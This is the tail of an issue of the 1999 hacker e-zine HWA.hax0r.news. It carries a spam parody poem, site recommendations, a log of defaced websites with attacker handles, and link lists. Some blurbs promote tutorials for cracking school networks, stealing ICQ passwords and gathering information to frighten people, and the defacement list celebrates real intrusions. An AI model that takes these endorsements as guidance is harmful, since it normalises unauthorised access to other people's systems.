|____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_| /_/ \_\___/\___|_|_|
|___/
/ \ _ __| |_
/ _ \ | '__| __|
/ ___ \| | | |_
/_/ \_\_| \__| TOO, for inclusion in future issues
Do the HWA logo etc and we'll showcase it here to show off your talents...remember
the 80's? dig out those ascii editors and do yer best...
_|
_|_|_| _|_| _|_|_|_|
_| _| _| _| _|
_| _| _| _| _|
_|_|_| _|_| _|_|
_|
_|_|
_| _|_|
_| _|_| _|_| _|_| _|_|_|_| _|
_|_| _| _| _| _| _| _|_|
_| _| _| _| _| _|
_| _|_| _|_| _|_| _|
Subject: Green eggs and spam
From: h-a-v-o-c@v-o-y-a-g-e-r.removedashes.net (Bill Rogers)
Newsgroups: news.admin.net-abuse.email
Wrote something like this a year or so ago but I don't think I ever
had the guts to post it.
Green Eggs and Spam
I love spam.
I'm Spammerman.
Won't you read my email spam?
I will not read your email spam.
Please don't disturb me, Spammerman.
Will you read it in the street?
Don't you think this stock is neat?
Don't you want some kiddie porn
And if you don't, just hit delete?
I will not read it in the street.
You're nuts to think I'll just delete.
Your kiddie porn is sad and sick
I'd like to beat you with a stick!
Your stock is just a sleazy scam
I do not LIKE you, Spammerman.
Will you read it on the beach?
Will you help support Free Speach?
You're in the wrong if you complain.
Murkowski says so, clear and plain.
I will not read it on the beach.
And by the way, it's spelled Free Speech
My email's packed with worthless stuff
And still you think there's not enough!
Just go to hell, that's what to do,
And take that hack Murkowski too!
I'll never read your email spam.
It's wrong and evil, Spammerman!
Will you buy my book that's next
About the secrets of male sex?
Or buy a set of plans from me
To steal your cable shows for free?
I will not buy that book from you
For I've no need.. perhaps YOU do!
I will not steal my cable shows.
Perhaps I could, but you should know
That I am HONEST, Spammerman.
That's something you can't understand.
Will you please Make Money Fast?
just send your money to the last
Address upon this list of four.
And what are you all hostile for?
I've this Remove List that I share.
It's worse than useless, but it's there!
I won't fall for Make Money Fast
So you can ram it up your rectal cavity,
And please don't think my wits are failing
At this twelve thousandth "one time mailing,"
That I'd get on a "remove list"
That makes spam grow and not desist.
But give your real address to me
And we shall see what we shall see.
Oh goody! Send your unmarked bills
My bedroom's in Suburban Hills
But if there's noise you'll start a fight.
My mom works on the streets at night
And Dad is sleeping off his wine.
So tell the postman "Choose your time,
And leave the cash in silent stealth."
Oh good! I've finally made some wealth!
Hey, Spammerman! I've found your place.
It's good to see your zit-pocked face
I'd like to tell you that I still
Don't read your spam and never will.
I will not read, I will not buy,
I think that those who spam should die!
So NEVER spam me any more.
The end. That's what I came here for.
Oh, who are all these other friends?
Well, just to help you make amends
For all the spamming that you've done,
I've brought your ISP, for one,
To cancel your account for you
And maybe break your kneecaps, too!
And here are Agents One and Two
Of FBI, to talk to you
About the kiddie porno laws
And when they're done, without a pause
The Post Inspection Service here
Would like to make it plainly clear
"Make Money Fast" is not legit
No matter what you claim for it.
And since it's chilly where you are
Ten thousand Netizens brought tar
And warming feathers, and a rail
To give you a free ride to jail.
So have a happy, spammy day!
And with these words, he walked away.
------- End of forwarded message -------
@HWA
SITE.1
#1
http://blacksun.box.sk.
The Black Sun
~~~~~~~~~~~~~
Raven sent in this url for his site which kicks some major ass, check it out for good
texts on beginning hacking and just generally how a web site should look. Nicely done
html with a webboard and good selection of texts.
Here's a list straight from the tutorials page;
Tutorials
Finished Tutorials
Networking and its security-related issues
* FTP Tutorial (version 2.1) - covers FTP hacking, FTP commands, what the hell is FTP and tons of tips and tricks (not all
FTP-related) in the newbies corner.
* RM Networks Tutorial (version 1.22) - yes, RM Networks. You know, those local networks, not Internet networks... RM
Networks are so stupid that they rely on the fact that the user is even dumber. Stumbled across one in your
school/University/college/working place? Want maximum privileges on it? Then try this tutorial.
* Ad Blocking Tutorial (version 1.8) - are you tired of seeing stupid commercials and popups popping on your screen and chewing
up your bandwidth? Then read this!
* Sendmail Tutorial (version 2.1) - find out why Sendmail is called 'the buggiest daemon on earth', and find out what a daemon is
anyway. Tons of ways to crack into big computers as well as PCs unleashed, including, of course, information on how to block
these holes.
* Anonymity Tutorial (version 1.2) - tired of people getting your IP over ICQ or IRC? Tired of website owners knowing
EVERYTHING about you? Tired of people tracing you by your Email address? Read this one and learn how to anonymize
yourself!
* Proxy/WinGate/SOCKS Tutorial (version 1.0) - don't know what a Proxy is? Don't know what a WinGate is? Don't know what
a SOCKS firewall is? Wanna learn how to increase your anonymity using them? Then read this one.
* Info Gathering Tutorial (version 1.3) - want to find private information about people and scare them like hell? Then read this
tutorial, you'll just love it!
* ICQ Security (version 1.0) - learn about ICQ's security flaws, how to exploit them and how to protect yourself from malicious
users who use these flaws against you. Stealing passwords, reading someone's entire hard drive, flooding, spoofing, DoSsing and
what not.
IRC-related issues
* IRC Warfare Tutorial (version 1.0) - ever wanted to know how those lamers keep taking over your channel and/or kicking you
off IRC? Learn to protect yourself here!
* Eggdrop Bots Tutorial (coming soon in a few days) - learn how to set up your own Eggdrop bots on IRC, and how to send
them commands, make them execute automated processes or commands on certain conditions or time etc'.
Local stuff
* Overclocking Tutorial (version 1.6) - tired of your old CPU? Your outdated 3D accelerator? Your X-type hardware? Then do
some overclocking! Get more speed from your hardware for free! This tutorial covers overclocking plus lots of explanations about
various pieces of hardware like the CMOS chip, the Cache chip, your RAM, BUS connections etc'.
* Windows Registry Tutorial (version 1.0) - learn more about the Windows registry. How does it work, what does it do and what
happened to the old .ini files?
* Standalone Security (this tutorial wasn't written by a BSRF member. Read about what exactly happened here).
* Interesting Things You Didn't Know About Your Computer's Hardware (version 1.0) - read Njan's amazing tutorial about all
those things you always wanted to know about PC hardware but never had the guts to ask.
Phreaking
* Phreaking Tutorial (version 1.0) - this should get all those newbie phreakers out there started. An excellent tutorial by Squiler, the
only phreaker aboard BSRF.
* Advanced Phreaking Tutorial (version 1.1) - already finished Squiler's phreaking tutorial? Want more? Then this one is for you!
More phreaking information and techniques, with some more advanced stuff than the previous one.
* The Ultimate Phreaking Tutorial II (version 1.0) - liked Squiler's first phreaking tutorial? Want more? Then read this one!
Cracking
* Cracking, Part I (version 1.0) - learn how to crack programs by yourself, and what the hell cracking means anyway.
Upcoming Tutorials
* DoS Attacks Tutorial - learn how DoS attacks work and how to protect yourself against them.
* Eggdrop Bots - learn how Eggdrop bots work and how to set up your own bot.
* PGP Tutorial - learn how PGP works behind the scenes and how to use it.
* The POP Protocol - wanna learn more on how Email works? Wanna delete spam and mailbombs on the server, without even
having to download them and fill your entire inbox? Then read this one once it gets out.
* Cracking, Part II + III - the continuation of Techlord's first cracking tutorial.
Translated Tutorials
Overclocking Tutorial (Lithuanian version) - by Saint.
#2
http://members.xoom.com/jcenters/HADL.html
The Hackers Anti-Defamation league
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Here's a site that most people should be aware of and try and visit, it's a good way of getting
your feelings across if nothing else...
From the site, almost verbatim;
The Hacker Anti-Defamation League
Since the early 80's, the press has used the term "hacker" to mean a malicious security breaker,
someone who likes to break into computer systems for fun. This is not a
hacker at all. This is in fact a cracker.
Hackers rather, are people who like to break out of boundaries and find solutions to problems.
Hackers not only exist in the software community, they are musicians, engineers, artists. You can
find hackers in almost any field. Here, we discuss mainly the software hacker: a person who enjoys
programming and exploring computers.
Hackers are the people who built the internet. They created Unix. They made the world wide web work.
Without the work of hackers you wouldn't be viewing this page today, and I wouldn't have written it.
The modern world owes a lot to hackers.
As a matter of fact, here are the definitions of hacker and cracker as defined by RFC 1983:
cracker
A cracker is an individual who attempts to access computer systems without authorization. These
individuals are often malicious, as opposed to hackers, and have many means at their disposal for
breaking into a system. See also: hacker, Computer Emergency Response Team, Trojan Horse, virus,
worm.
hacker
A person who delights in having an intimate understanding of the internal workings of a system,
computers and computer networks in particular. The term is often misused in a pejorative context,
where "cracker" would be the correct term. See also: cracker.
<snip>
You can Send in submissions for this section too if you've found (or RUN) a cool site...
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
check out http://www.attrition.org/mirror/attrition/groups.html to see who
you are up against. You can often gather intel from IRC as many of these
groups maintain a presence by having a channel with their group name as the
channel name, others aren't so obvious but do exist.
[9/20/99]
Defaced: http://www.adrian.edu/
By: bl0w team
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/www.adrian.edu
OS: NT
[9/20/99]
Defaced: http://www.empirehonda.com/
By: ytcråcker/s0n
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/www.empirehonda.com
OS: NT
[9/20/99]
Defaced: http://titans.khs.keansburg.k12.nj.us/
By: z0mba
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/titans.khs.keansburg.k12.nj.us
OS: Solaris
[9/20/99]
Defaced: http://www.euromicron.com/
By: HIT2000
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/www.euromicron.com
OS: NT
[9/20/99]
Defaced: http://www.g0ddess.com/
By: Unknown
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/20/www.g0ddess.com
OS: FreeBSD
Note: The defacement consists of a comment within the HTML of the mirror
[99.09.24] NT [HIT2000] Comavenir (www.comavenir.com)
[99.09.24] NT [eternal] King Sport Connection (www.kingsportconnection.org)
[99.09.24] Ir [ ] Arizona Libertarian Party (www.lpaz.org)
The 'lpaz' hack is interesting. No elite speak, no cussing. A seemingly
true political hack.
[9/24/99]
Defaced: http://www.iphone.com/
By: Unknown
Mirror:
http://www.attrition.org/mirror/attrition/1999/09/24/www.iphone.com/
Note: a targeted hack. The message is relevant to the domain defaced.
[99.09.25] NT [fEAR-mE] Thesaurus (www.thesaurus.net)
[99.09.25] Li [TREATY] FIS Gov (BO) (beta.fis.gov.bo)
[99.09.25] So [^CrackPyrate] NKFU Edu (TW) (ccms.nkfu.edu.tw)
[99.09.25] So [mistuh clean] MediaCity (SG) (pi.mediacity.com.sg)
[99.09.25] NT [HIT2000] France Commerce (www.franceecommerce.com)
[99.09.25] So [weLLfaRe] Plastic Politics (www.plasticpolitics.com)
[99.09.26] So [TREATY] M Carelba (IT) (carelba.it)
[99.09.26] Li [Pakistan HC] Emerald Systems (www.emeraldsystems.com)
[99.09.26] NT [139_r00ted] #2 Hoffman Bikes (www.hoffmanbikes.com)
[99.09.26] NT [139_r00ted] Surweb (www.surweb.org)
[99.09.26] NT [Forro Mob] Uniflex (BR) (www.uniflex.com.br)
[99.09.26] BI [FOaM] M Xtreme Webs (www.xtremewebs.com)
[99.09.28] NT [ytcracker] Altamira International Bank (www.altabank.com)
[99.09.28] NT [ytcracker] Fun Caribbean (www.funcaribbean.com)
[99.09.28] NT [Narcissus] M K Mount Gay (www.mountgay.com)
[99.09.28] NT [HIT2000] Le Monde Pub (www.mondepub.fr)
[99.09.28] NT [induce] Turkey's number one television channel (www.atv.com.tr)
[99.09.28] NT [fEAR-mE] BT USA (www.btusa.com)
[99.09.28] NT [ ] #4 Hoffman Bikes (www.hoffmanbikes.com)
[99.09.30] BI [Mister-X] DeltaNet (www2.deltanet.com)
[99.09.30] NT [GOD] Crockett County School District (www.technology.crockett.k12.tn.us)
[99.09.30] HP [hV2k] #2 Geofluids Engineering Lab, Seoul National University (petro.snu.ac.kr)
[99.09.30] So [mistuh clean] Web Yes Singapore (singapore.webyes.com)
[99.09.30] Li [ ] Suid Root (www.suidroot.org)
[99.09.30] NT [139_r00ted] PanAmSat Corporation (www.panamsat.com)
[9/28/99]
Defaced: http://www.mondepub.fr/
By: HIT2000
Mirror: http://www.attrition.org/mirror/attrition/1999/09/28/www.mondepub.fr
OS: NT
[9/28/99]
Defaced: http://www.atv.com.tr
By: induce
Mirror: http://www.attrition.org/mirror/attrition/1999/09/28/www.atv.com.tr
OS: NT
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondents and others, please send in links to news sites that
carry security news from other countries for inclusion in this list,
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
Brazil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada........: http://www.hackcanada.com
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland.......: http://hackunlimited.com/
Germany.......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa..: http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security-related e-zine.
.za (South Africa) sites contributed by wyzwun, thanks guy...
Got a link for this section? Email it to hwa@press.usmc.net and I'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]